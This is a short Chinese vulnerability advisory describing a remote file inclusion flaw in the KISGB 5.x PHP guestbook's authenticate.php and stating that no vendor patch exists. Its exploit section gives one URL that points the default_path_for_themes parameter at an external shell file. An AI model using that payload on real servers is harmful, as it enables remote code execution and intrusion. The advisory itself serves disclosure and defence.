添加时间:
2008-10-04

系统编号:
WAVDB-01086

影响版本:
KISGB 5.x

程序介绍:

KISGB（Keep It Simple Guest Book）是一款高级的PHP留言簿程序。

漏洞分析:

KISGB在处理用户请求时存在输入验证漏洞，远程攻击者可能利用此漏洞在服务器上以Web进程权限执行任意命令。

KISGB的authenticate.php脚本没有正确地验证default_path_for_themes参数的输入，允许攻击者通过包含本地或外部资源的任意文件导致执行任意代码。

漏洞利用:

http://www.site.***/[path]/authenticate.php?default_path_for_themes=http://mdxshell.txt? 

解决方案:
厂商补丁：
KISGB
-----
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：
http://sourceforge.net/projects/kisgb


信息来源:
<*来源：mdx （bilkopat@hotmail.com）
链接：http://secunia.com/advisories/23477/
*>